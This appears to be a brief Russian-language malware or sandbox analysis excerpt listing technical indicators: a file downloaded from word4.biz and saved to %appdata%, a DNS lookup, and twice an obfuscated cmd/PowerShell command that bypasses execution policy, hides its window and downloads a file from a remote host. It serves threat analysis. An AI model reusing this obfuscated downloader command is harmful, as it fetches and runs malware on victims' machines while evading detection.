Техническая информация
- https://word4.biz:888/test_file.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^weRs^he^ll.e^X^E^ -EXe^C^UTIo^NP^Ol^icY ^By^Pa^S^s ^-n^Op^RoFIl^e ^-WIN^DOWsty^L^E^ ^hi^d^d^eN^ ^(n^e^W-Obje^CT SyStEm^.NE^t.wEB^cLIen^t^)^.DOw^n^l^Oa^DFi^LE(^'https://w...
- DNS ASK wo##4.biz
- '<SYSTEM32>\cmd.exe' /c "po^weRs^he^ll.e^X^E^ -EXe^C^UTIo^NP^Ol^icY ^By^Pa^S^s ^-n^Op^RoFIl^e ^-WIN^DOWsty^L^E^ ^hi^d^d^eN^ ^(n^e^W-Obje^CT SyStEm^.NE^t.wEB^cLIen^t^)^.DOw^n^l^Oa^DFi^LE(^'https://w... (со скрытым окном)